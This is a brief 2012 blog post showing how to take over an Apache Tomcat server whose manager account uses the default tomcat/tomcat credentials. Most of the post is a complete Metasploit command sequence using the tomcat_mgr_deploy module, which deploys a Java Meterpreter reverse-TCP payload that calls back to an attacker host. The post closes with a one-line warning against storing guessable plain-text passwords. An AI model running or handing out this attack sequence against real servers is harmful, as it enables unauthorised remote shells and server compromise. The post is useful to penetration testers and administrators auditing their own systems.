Javier's Blog

Mostly computers and other tech stuff,...

Tuesday, January 17, 2012

Tomcat Exploitation with Metasploit

So if you have something like this in your tomcat/conf/tomcat-users.xml:

< ?xml version='1.0' encoding='utf-8'? >
< tomcat-users >
  < role rolename="manager"/ >
  < user username="tomcat" password="tomcat" roles="manager"/ >
< /tomcat-users >


You can use msf to pwn it:
./msfconsole
use exploit/multi/http/tomcat_mgr_deploy
set PASSWORD tomcat
set USERNAME tomcat
set RHOST 1.1.1.1
set RPORT 8080
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST 2.2.2.2
show options
set TARGET 1
exploit

This works on apache-tomcat-5.5.35 (confirmed) and 6.x, probably 7.x too. Moral of the story: don't use tomcat-users.xml to authenticate users, i.e., you are saving a password in plain-text and you are probably using an easily guessable password...